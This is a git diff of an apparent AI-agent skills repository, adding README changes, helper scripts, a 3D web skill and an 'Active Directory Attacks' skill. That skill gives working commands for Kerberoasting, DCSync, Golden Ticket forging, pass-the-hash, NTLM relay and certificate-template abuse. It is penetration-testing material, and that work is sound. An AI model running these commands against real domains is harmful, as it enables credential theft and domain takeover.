| **Webapp Testing** | Toolkit for interacting with and testing local web applications using Playwright. | `skills/webapp-testing` |
|
||||
| **Windows Privilege Escalation** | This skill should be used when the user asks to "escalate privileges on Windows," "find Windows privesc vectors," "enumerate Windows for privilege escalation," "exploit Windows misconfigurations," or "perform post-exploitation privilege escalation. | `skills/windows-privilege-escalation` |
|
||||
| **Wireshark Network Traffic Analysis** | This skill should be used when the user asks to "analyze network traffic with Wireshark", "capture packets for troubleshooting", "filter PCAP files", "follow TCP/UDP streams", "detect network anomalies", "investigate suspicious traffic", or "perform protocol analysis". | `skills/wireshark-analysis` |
|
||||
| **Workflow Automation** | "Design and implement automated workflows combining visual logic with custom code. | `skills/workflow-automation` |
|
||||
| **WordPress Penetration Testing** | This skill should be used when the user asks to "pentest WordPress sites", "scan WordPress for vulnerabilities", "enumerate WordPress users, themes, or plugins", "exploit WordPress vulnerabilities", or "use WPScan". | `skills/wordpress-penetration-testing` |
|
||||
| **Writing Plans** | Use when you have a spec or requirements for a multi-step task, before touching code. | `skills/writing-plans` |
|
||||
| **Writing Skills** | Use when creating new skills, editing existing skills, or verifying skills work before deployment. | `skills/writing-skills` |
|
||||
| **XLSX (Official)** | "Comprehensive spreadsheet creation, editing, and analysis with support for formulas, formatting, data analysis, and visualization. | `skills/xlsx-official` |
|
||||
|
||||
> [!TIP]
|
||||
> Use the `validate_skills.py` script in the `scripts/` directory to ensure all skills are properly formatted and ready for use.
|
||||
@@ -93,10 +192,20 @@ Below is the complete list of available skills. Each skill folder contains a `SK
|
||||
|
||||
## Installation
|
||||
|
||||
To use these skills with **Antigravity** or **Claude Code**, clone this repository into your agent's skills directory:
|
||||
To use these skills with **Claude Code**, **Gemini CLI**, **Codex CLI**, **Cursor**, **Antigravity**, or **OpenCode**, clone this repository into your agent's skills directory:
|
||||
|
||||
```bash
|
||||
# Universal installation (works with most tools)
|
||||
git clone https://github.com/sickn33/antigravity-awesome-skills.git .agent/skills
|
||||
|
||||
# Claude Code specific
|
||||
git clone https://github.com/sickn33/antigravity-awesome-skills.git .claude/skills
|
||||
|
||||
# Gemini CLI specific
|
||||
git clone https://github.com/sickn33/antigravity-awesome-skills.git .gemini/skills
|
||||
|
||||
# Cursor specific
|
||||
git clone https://github.com/sickn33/antigravity-awesome-skills.git .cursor/skills
|
||||
```
|
||||
|
||||
---
|
||||
@@ -122,7 +231,9 @@ This collection would not be possible without the incredible work of the Claude
|
||||
### Official Sources
|
||||
|
||||
- **[anthropics/skills](https://github.com/anthropics/skills)**: Official Anthropic skills repository - Document manipulation (DOCX, PDF, PPTX, XLSX), Brand Guidelines, Internal Communications.
|
||||
- **[anthropics/claude-cookbooks](https://github.com/anthropics/claude-cookbooks)**: Official notebooks and recipes for building with Claude.
|
||||
- **[vercel-labs/agent-skills](https://github.com/vercel-labs/agent-skills)**: Vercel Labs official skills - React Best Practices, Web Design Guidelines.
|
||||
- **[openai/skills](https://github.com/openai/skills)**: OpenAI Codex skills catalog - Agent skills, Skill Creator, Concise Planning.
|
||||
|
||||
### Community Contributors
|
||||
|
||||
@@ -131,8 +242,15 @@ This collection would not be possible without the incredible work of the Claude
|
||||
- **[diet103/claude-code-infrastructure-showcase](https://github.com/diet103/claude-code-infrastructure-showcase)**: Infrastructure and Backend/Frontend Guidelines.
|
||||
- **[ChrisWiles/claude-code-showcase](https://github.com/ChrisWiles/claude-code-showcase)**: React UI patterns and Design Systems.
|
||||
- **[travisvn/awesome-claude-skills](https://github.com/travisvn/awesome-claude-skills)**: Loki Mode and Playwright integration.
|
||||
- **[zebbern/claude-code-guide](https://github.com/zebbern/claude-code-guide)**: Comprehensive Security suite.
|
||||
- **[zebbern/claude-code-guide](https://github.com/zebbern/claude-code-guide)**: Comprehensive Security suite & Guide (Source for ~60 new skills).
|
||||
- **[alirezarezvani/claude-skills](https://github.com/alirezarezvani/claude-skills)**: Senior Engineering and PM toolkit.
|
||||
- **[karanb192/awesome-claude-skills](https://github.com/karanb192/awesome-claude-skills)**: A massive list of verified skills for Claude Code.
|
||||
- **[zircote/.claude](https://github.com/zircote/.claude)**: Shopify development skill reference.
|
||||
|
||||
### Inspirations
|
||||
|
||||
- **[f/awesome-chatgpt-prompts](https://github.com/f/awesome-chatgpt-prompts)**: Inspiration for the Prompt Library.
|
||||
- **[leonardomso/33-js-concepts](https://github.com/leonardomso/33-js-concepts)**: Inspiration for JavaScript Mastery.
|
||||
|
||||
---
|
||||
|
||||
@@ -142,4 +260,18 @@ MIT License. See [LICENSE](LICENSE) for details.
|
||||
|
||||
---
|
||||
|
||||
**Keywords**: Claude Code, Antigravity, Agentic Skills, MCT, AI Agents, Autonomous Coding, Security Auditing, React Patterns.
|
||||
**Keywords**: Claude Code, Gemini CLI, Codex CLI, Antigravity IDE, GitHub Copilot, Cursor, OpenCode, Agentic Skills, AI Coding Assistant, AI Agent Skills, MCP, MCT, AI Agents, Autonomous Coding, Security Auditing, React Patterns, LLM Tools, AI IDE, Coding AI, AI Pair Programming, Vibe Coding, Agentic Coding, AI Developer Tools.
|
||||
|
||||
---
|
||||
|
||||
## 🏷️ GitHub Topics
|
||||
|
||||
For repository maintainers, add these topics to maximize discoverability:
|
||||
|
||||
```text
|
||||
claude-code, gemini-cli, codex-cli, antigravity, cursor, github-copilot, opencode,
|
||||
agentic-skills, ai-coding, llm-tools, ai-agents, autonomous-coding, mcp,
|
||||
ai-developer-tools, ai-pair-programming, vibe-coding, skill, skills, SKILL.md, rules.md, CLAUDE.md, GEMINI.md, CURSOR.md
|
||||
claude-code, gemini-cli, codex-cli, antigravity, cursor, github-copilot, opencode,
|
||||
agentic-skills, ai-coding, llm-tools, ai-agents, autonomous-coding, mcp
|
||||
```
|
||||
|
||||
119
scripts/skills_manager.py
Executable file
119
scripts/skills_manager.py
Executable file
@@ -0,0 +1,119 @@
|
||||
#!/usr/bin/env python3
|
||||
"""
|
||||
Skills Manager - Easily enable/disable skills locally
|
||||
|
||||
Usage:
|
||||
python3 scripts/skills_manager.py list # List active skills
|
||||
python3 scripts/skills_manager.py disabled # List disabled skills
|
||||
python3 scripts/skills_manager.py enable SKILL # Enable a skill
|
||||
python3 scripts/skills_manager.py disable SKILL # Disable a skill
|
||||
"""
|
||||
|
||||
import sys
|
||||
import os
|
||||
from pathlib import Path
|
||||
|
||||
SKILLS_DIR = Path(__file__).parent.parent / "skills"
|
||||
DISABLED_DIR = SKILLS_DIR / ".disabled"
|
||||
|
||||
def list_active():
|
||||
"""List all active skills"""
|
||||
print("🟢 Active Skills:\n")
|
||||
skills = sorted([d.name for d in SKILLS_DIR.iterdir()
|
||||
if d.is_dir() and not d.name.startswith('.')])
|
||||
symlinks = sorted([s.name for s in SKILLS_DIR.iterdir()
|
||||
if s.is_symlink()])
|
||||
|
||||
for skill in skills:
|
||||
print(f" • {skill}")
|
||||
|
||||
if symlinks:
|
||||
print("\n📎 Symlinks:")
|
||||
for link in symlinks:
|
||||
target = os.readlink(SKILLS_DIR / link)
|
||||
print(f" • {link} → {target}")
|
||||
|
||||
print(f"\n✅ Total: {len(skills)} skills + {len(symlinks)} symlinks")
|
||||
|
||||
def list_disabled():
|
||||
"""List all disabled skills"""
|
||||
if not DISABLED_DIR.exists():
|
||||
print("❌ No disabled skills directory found")
|
||||
return
|
||||
|
||||
print("⚪ Disabled Skills:\n")
|
||||
disabled = sorted([d.name for d in DISABLED_DIR.iterdir() if d.is_dir()])
|
||||
|
||||
for skill in disabled:
|
||||
print(f" • {skill}")
|
||||
|
||||
print(f"\n📊 Total: {len(disabled)} disabled skills")
|
||||
|
||||
def enable_skill(skill_name):
|
||||
"""Enable a disabled skill"""
|
||||
source = DISABLED_DIR / skill_name
|
||||
target = SKILLS_DIR / skill_name
|
||||
|
||||
if not source.exists():
|
||||
print(f"❌ Skill '{skill_name}' not found in .disabled/")
|
||||
return False
|
||||
|
||||
if target.exists():
|
||||
print(f"⚠️ Skill '{skill_name}' is already active")
|
||||
return False
|
||||
|
||||
source.rename(target)
|
||||
print(f"✅ Enabled: {skill_name}")
|
||||
return True
|
||||
|
||||
def disable_skill(skill_name):
|
||||
"""Disable an active skill"""
|
||||
source = SKILLS_DIR / skill_name
|
||||
target = DISABLED_DIR / skill_name
|
||||
|
||||
if not source.exists():
|
||||
print(f"❌ Skill '{skill_name}' not found")
|
||||
return False
|
||||
|
||||
if source.name.startswith('.'):
|
||||
print(f"⚠️ Cannot disable system directory: {skill_name}")
|
||||
return False
|
||||
|
||||
if source.is_symlink():
|
||||
print(f"⚠️ Cannot disable symlink: {skill_name}")
|
||||
print(f" (Remove the symlink manually if needed)")
|
||||
return False
|
||||
|
||||
DISABLED_DIR.mkdir(exist_ok=True)
|
||||
source.rename(target)
|
||||
print(f"✅ Disabled: {skill_name}")
|
||||
return True
|
||||
|
||||
def main():
|
||||
if len(sys.argv) < 2:
|
||||
print(__doc__)
|
||||
sys.exit(1)
|
||||
|
||||
command = sys.argv[1].lower()
|
||||
|
||||
if command == "list":
|
||||
list_active()
|
||||
elif command == "disabled":
|
||||
list_disabled()
|
||||
elif command == "enable":
|
||||
if len(sys.argv) < 3:
|
||||
print("❌ Usage: skills_manager.py enable SKILL_NAME")
|
||||
sys.exit(1)
|
||||
enable_skill(sys.argv[2])
|
||||
elif command == "disable":
|
||||
if len(sys.argv) < 3:
|
||||
print("❌ Usage: skills_manager.py disable SKILL_NAME")
|
||||
sys.exit(1)
|
||||
disable_skill(sys.argv[2])
|
||||
else:
|
||||
print(f"❌ Unknown command: {command}")
|
||||
print(__doc__)
|
||||
sys.exit(1)
|
||||
|
||||
if __name__ == "__main__":
|
||||
main()
|
||||
114
scripts/sync_recommended_skills.sh
Executable file
114
scripts/sync_recommended_skills.sh
Executable file
@@ -0,0 +1,114 @@
|
||||
#!/bin/bash
|
||||
# sync_recommended_skills.sh
|
||||
# Syncs only the 35 recommended skills from GitHub repo to local central library
|
||||
|
||||
set -e
|
||||
|
||||
# Paths
|
||||
GITHUB_REPO="/Users/nicco/Antigravity Projects/antigravity-awesome-skills/skills"
|
||||
LOCAL_LIBRARY="/Users/nicco/.gemini/antigravity/scratch/.agent/skills"
|
||||
BACKUP_DIR="/Users/nicco/.gemini/antigravity/scratch/.agent/skills_backup_$(date +%Y%m%d_%H%M%S)"
|
||||
|
||||
# 35 Recommended Skills
|
||||
RECOMMENDED_SKILLS=(
|
||||
# Tier S - Core Development (13)
|
||||
"systematic-debugging"
|
||||
"test-driven-development"
|
||||
"writing-skills"
|
||||
"doc-coauthoring"
|
||||
"planning-with-files"
|
||||
"concise-planning"
|
||||
"software-architecture"
|
||||
"senior-architect"
|
||||
"senior-fullstack"
|
||||
"verification-before-completion"
|
||||
"git-pushing"
|
||||
"address-github-comments"
|
||||
"javascript-mastery"
|
||||
|
||||
# Tier A - Your Projects (12)
|
||||
"docx-official"
|
||||
"pdf-official"
|
||||
"pptx-official"
|
||||
"xlsx-official"
|
||||
"react-best-practices"
|
||||
"web-design-guidelines"
|
||||
"frontend-dev-guidelines"
|
||||
"webapp-testing"
|
||||
"playwright-skill"
|
||||
"mcp-builder"
|
||||
"notebooklm"
|
||||
"ui-ux-pro-max"
|
||||
|
||||
# Marketing & SEO (1)
|
||||
"content-creator"
|
||||
|
||||
# Corporate (4)
|
||||
"brand-guidelines-anthropic"
|
||||
"brand-guidelines-community"
|
||||
"internal-comms-anthropic"
|
||||
"internal-comms-community"
|
||||
|
||||
# Planning & Documentation (1)
|
||||
"writing-plans"
|
||||
|
||||
# AI & Automation (5)
|
||||
"workflow-automation"
|
||||
"llm-app-patterns"
|
||||
"autonomous-agent-patterns"
|
||||
"prompt-library"
|
||||
"github-workflow-automation"
|
||||
)
|
||||
|
||||
echo "🔄 Sync Recommended Skills"
|
||||
echo "========================="
|
||||
echo ""
|
||||
echo "📍 Source: $GITHUB_REPO"
|
||||
echo "📍 Target: $LOCAL_LIBRARY"
|
||||
echo "📊 Skills to sync: ${#RECOMMENDED_SKILLS[@]}"
|
||||
echo ""
|
||||
|
||||
# Create backup
|
||||
echo "📦 Creating backup at: $BACKUP_DIR"
|
||||
cp -r "$LOCAL_LIBRARY" "$BACKUP_DIR"
|
||||
echo "✅ Backup created"
|
||||
echo ""
|
||||
|
||||
# Clear local library (keep README.md if exists)
|
||||
echo "🗑️ Clearing local library..."
|
||||
cd "$LOCAL_LIBRARY"
|
||||
for item in */; do
|
||||
rm -rf "$item"
|
||||
done
|
||||
echo "✅ Local library cleared"
|
||||
echo ""
|
||||
|
||||
# Copy recommended skills
|
||||
echo "📋 Copying recommended skills..."
|
||||
SUCCESS_COUNT=0
|
||||
MISSING_COUNT=0
|
||||
|
||||
for skill in "${RECOMMENDED_SKILLS[@]}"; do
|
||||
if [ -d "$GITHUB_REPO/$skill" ]; then
|
||||
cp -r "$GITHUB_REPO/$skill" "$LOCAL_LIBRARY/"
|
||||
echo " ✅ $skill"
|
||||
((SUCCESS_COUNT++))
|
||||
else
|
||||
echo " ⚠️ $skill (not found in repo)"
|
||||
((MISSING_COUNT++))
|
||||
fi
|
||||
done
|
||||
|
||||
echo ""
|
||||
echo "📊 Summary"
|
||||
echo "=========="
|
||||
echo "✅ Copied: $SUCCESS_COUNT skills"
|
||||
echo "⚠️ Missing: $MISSING_COUNT skills"
|
||||
echo "📦 Backup: $BACKUP_DIR"
|
||||
echo ""
|
||||
|
||||
# Verify
|
||||
FINAL_COUNT=$(find "$LOCAL_LIBRARY" -maxdepth 1 -type d ! -name "." | wc -l | tr -d ' ')
|
||||
echo "🎯 Final count in local library: $FINAL_COUNT skills"
|
||||
echo ""
|
||||
echo "Done! Your local library now has only the recommended skills."
|
||||
3
skills/.gitignore
vendored
Normal file
3
skills/.gitignore
vendored
Normal file
@@ -0,0 +1,3 @@
|
||||
# Local-only: disabled skills for lean configuration
|
||||
# These skills are kept in the repository but disabled locally
|
||||
.disabled/
|
||||
254
skills/3d-web-experience/SKILL.md
Normal file
254
skills/3d-web-experience/SKILL.md
Normal file
@@ -0,0 +1,254 @@
|
||||
---
|
||||
name: 3d-web-experience
|
||||
description: "Expert in building 3D experiences for the web - Three.js, React Three Fiber, Spline, WebGL, and interactive 3D scenes. Covers product configurators, 3D portfolios, immersive websites, and bringing depth to web experiences. Use when: 3D website, three.js, WebGL, react three fiber, 3D experience."
|
||||
source: vibeship-spawner-skills (Apache 2.0)
|
||||
---
|
||||
|
||||
# 3D Web Experience
|
||||
|
||||
**Role**: 3D Web Experience Architect
|
||||
|
||||
You bring the third dimension to the web. You know when 3D enhances
|
||||
and when it's just showing off. You balance visual impact with
|
||||
performance. You make 3D accessible to users who've never touched
|
||||
a 3D app. You create moments of wonder without sacrificing usability.
|
||||
|
||||
## Capabilities
|
||||
|
||||
- Three.js implementation
|
||||
- React Three Fiber
|
||||
- WebGL optimization
|
||||
- 3D model integration
|
||||
- Spline workflows
|
||||
- 3D product configurators
|
||||
- Interactive 3D scenes
|
||||
- 3D performance optimization
|
||||
|
||||
## Patterns
|
||||
|
||||
### 3D Stack Selection
|
||||
|
||||
Choosing the right 3D approach
|
||||
|
||||
**When to use**: When starting a 3D web project
|
||||
|
||||
```python
|
||||
## 3D Stack Selection
|
||||
|
||||
### Options Comparison
|
||||
| Tool | Best For | Learning Curve | Control |
|
||||
|------|----------|----------------|---------|
|
||||
| Spline | Quick prototypes, designers | Low | Medium |
|
||||
| React Three Fiber | React apps, complex scenes | Medium | High |
|
||||
| Three.js vanilla | Max control, non-React | High | Maximum |
|
||||
| Babylon.js | Games, heavy 3D | High | Maximum |
|
||||
|
||||
### Decision Tree
|
||||
```
|
||||
Need quick 3D element?
|
||||
└── Yes → Spline
|
||||
└── No → Continue
|
||||
|
||||
Using React?
|
||||
└── Yes → React Three Fiber
|
||||
└── No → Continue
|
||||
|
||||
Need max performance/control?
|
||||
└── Yes → Three.js vanilla
|
||||
└── No → Spline or R3F
|
||||
```
|
||||
|
||||
### Spline (Fastest Start)
|
||||
```jsx
|
||||
import Spline from '@splinetool/react-spline';
|
||||
|
||||
export default function Scene() {
|
||||
return (
|
||||
<Spline scene="https://prod.spline.design/xxx/scene.splinecode" />
|
||||
);
|
||||
}
|
||||
```
|
||||
|
||||
### React Three Fiber
|
||||
```jsx
|
||||
import { Canvas } from '@react-three/fiber';
|
||||
import { OrbitControls, useGLTF } from '@react-three/drei';
|
||||
|
||||
function Model() {
|
||||
const { scene } = useGLTF('/model.glb');
|
||||
return <primitive object={scene} />;
|
||||
}
|
||||
|
||||
export default function Scene() {
|
||||
return (
|
||||
<Canvas>
|
||||
<ambientLight />
|
||||
<Model />
|
||||
<OrbitControls />
|
||||
</Canvas>
|
||||
);
|
||||
}
|
||||
```
|
||||
```
|
||||
|
||||
### 3D Model Pipeline
|
||||
|
||||
Getting models web-ready
|
||||
|
||||
**When to use**: When preparing 3D assets
|
||||
|
||||
```python
|
||||
## 3D Model Pipeline
|
||||
|
||||
### Format Selection
|
||||
| Format | Use Case | Size |
|
||||
|--------|----------|------|
|
||||
| GLB/GLTF | Standard web 3D | Smallest |
|
||||
| FBX | From 3D software | Large |
|
||||
| OBJ | Simple meshes | Medium |
|
||||
| USDZ | Apple AR | Medium |
|
||||
|
||||
### Optimization Pipeline
|
||||
```
|
||||
1. Model in Blender/etc
|
||||
2. Reduce poly count (< 100K for web)
|
||||
3. Bake textures (combine materials)
|
||||
4. Export as GLB
|
||||
5. Compress with gltf-transform
|
||||
6. Test file size (< 5MB ideal)
|
||||
```
|
||||
|
||||
### GLTF Compression
|
||||
```bash
|
||||
# Install gltf-transform
|
||||
npm install -g @gltf-transform/cli
|
||||
|
||||
# Compress model
|
||||
gltf-transform optimize input.glb output.glb \
|
||||
--compress draco \
|
||||
--texture-compress webp
|
||||
```
|
||||
|
||||
### Loading in R3F
|
||||
```jsx
|
||||
import { useGLTF, useProgress, Html } from '@react-three/drei';
|
||||
import { Suspense } from 'react';
|
||||
|
||||
function Loader() {
|
||||
const { progress } = useProgress();
|
||||
return <Html center>{progress.toFixed(0)}%</Html>;
|
||||
}
|
||||
|
||||
export default function Scene() {
|
||||
return (
|
||||
<Canvas>
|
||||
<Suspense fallback={<Loader />}>
|
||||
<Model />
|
||||
</Suspense>
|
||||
</Canvas>
|
||||
);
|
||||
}
|
||||
```
|
||||
```
|
||||
|
||||
### Scroll-Driven 3D
|
||||
|
||||
3D that responds to scroll
|
||||
|
||||
**When to use**: When integrating 3D with scroll
|
||||
|
||||
```python
|
||||
## Scroll-Driven 3D
|
||||
|
||||
### R3F + Scroll Controls
|
||||
```jsx
|
||||
import { ScrollControls, useScroll } from '@react-three/drei';
|
||||
import { useFrame } from '@react-three/fiber';
|
||||
|
||||
function RotatingModel() {
|
||||
const scroll = useScroll();
|
||||
const ref = useRef();
|
||||
|
||||
useFrame(() => {
|
||||
// Rotate based on scroll position
|
||||
ref.current.rotation.y = scroll.offset * Math.PI * 2;
|
||||
});
|
||||
|
||||
return <mesh ref={ref}>...</mesh>;
|
||||
}
|
||||
|
||||
export default function Scene() {
|
||||
return (
|
||||
<Canvas>
|
||||
<ScrollControls pages={3}>
|
||||
<RotatingModel />
|
||||
</ScrollControls>
|
||||
</Canvas>
|
||||
);
|
||||
}
|
||||
```
|
||||
|
||||
### GSAP + Three.js
|
||||
```javascript
|
||||
import gsap from 'gsap';
|
||||
import ScrollTrigger from 'gsap/ScrollTrigger';
|
||||
|
||||
gsap.to(camera.position, {
|
||||
scrollTrigger: {
|
||||
trigger: '.section',
|
||||
scrub: true,
|
||||
},
|
||||
z: 5,
|
||||
y: 2,
|
||||
});
|
||||
```
|
||||
|
||||
### Common Scroll Effects
|
||||
- Camera movement through scene
|
||||
- Model rotation on scroll
|
||||
- Reveal/hide elements
|
||||
- Color/material changes
|
||||
- Exploded view animations
|
||||
```
|
||||
|
||||
## Anti-Patterns
|
||||
|
||||
### ❌ 3D For 3D's Sake
|
||||
|
||||
**Why bad**: Slows down the site.
|
||||
Confuses users.
|
||||
Battery drain on mobile.
|
||||
Doesn't help conversion.
|
||||
|
||||
**Instead**: 3D should serve a purpose.
|
||||
Product visualization = good.
|
||||
Random floating shapes = probably not.
|
||||
Ask: would an image work?
|
||||
|
||||
### ❌ Desktop-Only 3D
|
||||
|
||||
**Why bad**: Most traffic is mobile.
|
||||
Kills battery.
|
||||
Crashes on low-end devices.
|
||||
Frustrated users.
|
||||
|
||||
**Instead**: Test on real mobile devices.
|
||||
Reduce quality on mobile.
|
||||
Provide static fallback.
|
||||
Consider disabling 3D on low-end.
|
||||
|
||||
### ❌ No Loading State
|
||||
|
||||
**Why bad**: Users think it's broken.
|
||||
High bounce rate.
|
||||
3D takes time to load.
|
||||
Bad first impression.
|
||||
|
||||
**Instead**: Loading progress indicator.
|
||||
Skeleton/placeholder.
|
||||
Load 3D after page is interactive.
|
||||
Optimize model size.
|
||||
|
||||
## Related Skills
|
||||
|
||||
Works well with: `scroll-experience`, `interactive-portfolio`, `frontend`, `landing-page-design`
|
||||
380
skills/active-directory-attacks/SKILL.md
Normal file
380
skills/active-directory-attacks/SKILL.md
Normal file
@@ -0,0 +1,380 @@
|
||||
---
|
||||
name: Active Directory Attacks
|
||||
description: This skill should be used when the user asks to "attack Active Directory", "exploit AD", "Kerberoasting", "DCSync", "pass-the-hash", "BloodHound enumeration", "Golden Ticket", "Silver Ticket", "AS-REP roasting", "NTLM relay", or needs guidance on Windows domain penetration testing.
|
||||
---
|
||||
|
||||
# Active Directory Attacks
|
||||
|
||||
## Purpose
|
||||
|
||||
Provide comprehensive techniques for attacking Microsoft Active Directory environments. Covers reconnaissance, credential harvesting, Kerberos attacks, lateral movement, privilege escalation, and domain dominance for red team operations and penetration testing.
|
||||
|
||||
## Inputs/Prerequisites
|
||||
|
||||
- Kali Linux or Windows attack platform
|
||||
- Domain user credentials (for most attacks)
|
||||
- Network access to Domain Controller
|
||||
- Tools: Impacket, Mimikatz, BloodHound, Rubeus, CrackMapExec
|
||||
|
||||
## Outputs/Deliverables
|
||||
|
||||
- Domain enumeration data
|
||||
- Extracted credentials and hashes
|
||||
- Kerberos tickets for impersonation
|
||||
- Domain Administrator access
|
||||
- Persistent access mechanisms
|
||||
|
||||
---
|
||||
|
||||
## Essential Tools
|
||||
|
||||
| Tool | Purpose |
|
||||
|------|---------|
|
||||
| BloodHound | AD attack path visualization |
|
||||
| Impacket | Python AD attack tools |
|
||||
| Mimikatz | Credential extraction |
|
||||
| Rubeus | Kerberos attacks |
|
||||
| CrackMapExec | Network exploitation |
|
||||
| PowerView | AD enumeration |
|
||||
| Responder | LLMNR/NBT-NS poisoning |
|
||||
|
||||
---
|
||||
|
||||
## Core Workflow
|
||||
|
||||
### Step 1: Kerberos Clock Sync
|
||||
|
||||
Kerberos requires clock synchronization (±5 minutes):
|
||||
|
||||
```bash
|
||||
# Detect clock skew
|
||||
nmap -sT 10.10.10.10 -p445 --script smb2-time
|
||||
|
||||
# Fix clock on Linux
|
||||
sudo date -s "14 APR 2024 18:25:16"
|
||||
|
||||
# Fix clock on Windows
|
||||
net time /domain /set
|
||||
|
||||
# Fake clock without changing system time
|
||||
faketime -f '+8h' <command>
|
||||
```
|
||||
|
||||
### Step 2: AD Reconnaissance with BloodHound
|
||||
|
||||
```bash
|
||||
# Start BloodHound
|
||||
neo4j console
|
||||
bloodhound --no-sandbox
|
||||
|
||||
# Collect data with SharpHound
|
||||
.\SharpHound.exe -c All
|
||||
.\SharpHound.exe -c All --ldapusername user --ldappassword pass
|
||||
|
||||
# Python collector (from Linux)
|
||||
bloodhound-python -u 'user' -p 'password' -d domain.local -ns 10.10.10.10 -c all
|
||||
```
|
||||
|
||||
### Step 3: PowerView Enumeration
|
||||
|
||||
```powershell
|
||||
# Get domain info
|
||||
Get-NetDomain
|
||||
Get-DomainSID
|
||||
Get-NetDomainController
|
||||
|
||||
# Enumerate users
|
||||
Get-NetUser
|
||||
Get-NetUser -SamAccountName targetuser
|
||||
Get-UserProperty -Properties pwdlastset
|
||||
|
||||
# Enumerate groups
|
||||
Get-NetGroupMember -GroupName "Domain Admins"
|
||||
Get-DomainGroup -Identity "Domain Admins" | Select-Object -ExpandProperty Member
|
||||
|
||||
# Find local admin access
|
||||
Find-LocalAdminAccess -Verbose
|
||||
|
||||
# User hunting
|
||||
Invoke-UserHunter
|
||||
Invoke-UserHunter -Stealth
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Credential Attacks
|
||||
|
||||
### Password Spraying
|
||||
|
||||
```bash
|
||||
# Using kerbrute
|
||||
./kerbrute passwordspray -d domain.local --dc 10.10.10.10 users.txt Password123
|
||||
|
||||
# Using CrackMapExec
|
||||
crackmapexec smb 10.10.10.10 -u users.txt -p 'Password123' --continue-on-success
|
||||
```
|
||||
|
||||
### Kerberoasting
|
||||
|
||||
Extract service account TGS tickets and crack offline:
|
||||
|
||||
```bash
|
||||
# Impacket
|
||||
GetUserSPNs.py domain.local/user:password -dc-ip 10.10.10.10 -request -outputfile hashes.txt
|
||||
|
||||
# Rubeus
|
||||
.\Rubeus.exe kerberoast /outfile:hashes.txt
|
||||
|
||||
# CrackMapExec
|
||||
crackmapexec ldap 10.10.10.10 -u user -p password --kerberoast output.txt
|
||||
|
||||
# Crack with hashcat
|
||||
hashcat -m 13100 hashes.txt rockyou.txt
|
||||
```
|
||||
|
||||
### AS-REP Roasting
|
||||
|
||||
Target accounts with "Do not require Kerberos preauthentication":
|
||||
|
||||
```bash
|
||||
# Impacket
|
||||
GetNPUsers.py domain.local/ -usersfile users.txt -dc-ip 10.10.10.10 -format hashcat
|
||||
|
||||
# Rubeus
|
||||
.\Rubeus.exe asreproast /format:hashcat /outfile:hashes.txt
|
||||
|
||||
# Crack with hashcat
|
||||
hashcat -m 18200 hashes.txt rockyou.txt
|
||||
```
|
||||
|
||||
### DCSync Attack
|
||||
|
||||
Extract credentials directly from DC (requires Replicating Directory Changes rights):
|
||||
|
||||
```bash
|
||||
# Impacket
|
||||
secretsdump.py domain.local/admin:password@10.10.10.10 -just-dc-user krbtgt
|
||||
|
||||
# Mimikatz
|
||||
lsadump::dcsync /domain:domain.local /user:krbtgt
|
||||
lsadump::dcsync /domain:domain.local /user:Administrator
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Kerberos Ticket Attacks
|
||||
|
||||
### Pass-the-Ticket (Golden Ticket)
|
||||
|
||||
Forge TGT with krbtgt hash for any user:
|
||||
|
||||
```powershell
|
||||
# Get krbtgt hash via DCSync first
|
||||
# Mimikatz - Create Golden Ticket
|
||||
kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-xxx /krbtgt:HASH /id:500 /ptt
|
||||
|
||||
# Impacket
|
||||
ticketer.py -nthash KRBTGT_HASH -domain-sid S-1-5-21-xxx -domain domain.local Administrator
|
||||
export KRB5CCNAME=Administrator.ccache
|
||||
psexec.py -k -no-pass domain.local/Administrator@dc.domain.local
|
||||
```
|
||||
|
||||
### Silver Ticket
|
||||
|
||||
Forge TGS for specific service:
|
||||
|
||||
```powershell
|
||||
# Mimikatz
|
||||
kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-xxx /target:server.domain.local /service:cifs /rc4:SERVICE_HASH /ptt
|
||||
```
|
||||
|
||||
### Pass-the-Hash
|
||||
|
||||
```bash
|
||||
# Impacket
|
||||
psexec.py domain.local/Administrator@10.10.10.10 -hashes :NTHASH
|
||||
wmiexec.py domain.local/Administrator@10.10.10.10 -hashes :NTHASH
|
||||
smbexec.py domain.local/Administrator@10.10.10.10 -hashes :NTHASH
|
||||
|
||||
# CrackMapExec
|
||||
crackmapexec smb 10.10.10.10 -u Administrator -H NTHASH -d domain.local
|
||||
crackmapexec smb 10.10.10.10 -u Administrator -H NTHASH --local-auth
|
||||
```
|
||||
|
||||
### OverPass-the-Hash
|
||||
|
||||
Convert NTLM hash to Kerberos ticket:
|
||||
|
||||
```bash
|
||||
# Impacket
|
||||
getTGT.py domain.local/user -hashes :NTHASH
|
||||
export KRB5CCNAME=user.ccache
|
||||
|
||||
# Rubeus
|
||||
.\Rubeus.exe asktgt /user:user /rc4:NTHASH /ptt
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## NTLM Relay Attacks
|
||||
|
||||
### Responder + ntlmrelayx
|
||||
|
||||
```bash
|
||||
# Start Responder (disable SMB/HTTP for relay)
|
||||
responder -I eth0 -wrf
|
||||
|
||||
# Start relay
|
||||
ntlmrelayx.py -tf targets.txt -smb2support
|
||||
|
||||
# LDAP relay for delegation attack
|
||||
ntlmrelayx.py -t ldaps://dc.domain.local -wh attacker-wpad --delegate-access
|
||||
```
|
||||
|
||||
### SMB Signing Check
|
||||
|
||||
```bash
|
||||
crackmapexec smb 10.10.10.0/24 --gen-relay-list targets.txt
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Certificate Services Attacks (AD CS)
|
||||
|
||||
### ESC1 - Misconfigured Templates
|
||||
|
||||
```bash
|
||||
# Find vulnerable templates
|
||||
certipy find -u user@domain.local -p password -dc-ip 10.10.10.10
|
||||
|
||||
# Exploit ESC1
|
||||
certipy req -u user@domain.local -p password -ca CA-NAME -target dc.domain.local -template VulnTemplate -upn administrator@domain.local
|
||||
|
||||
# Authenticate with certificate
|
||||
certipy auth -pfx administrator.pfx -dc-ip 10.10.10.10
|
||||
```
|
||||
|
||||
### ESC8 - Web Enrollment Relay
|
||||
|
||||
```bash
|
||||
ntlmrelayx.py -t http://ca.domain.local/certsrv/certfnsh.asp -smb2support --adcs --template DomainController
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Critical CVEs
|
||||
|
||||
### ZeroLogon (CVE-2020-1472)
|
||||
|
||||
```bash
|
||||
# Check vulnerability
|
||||
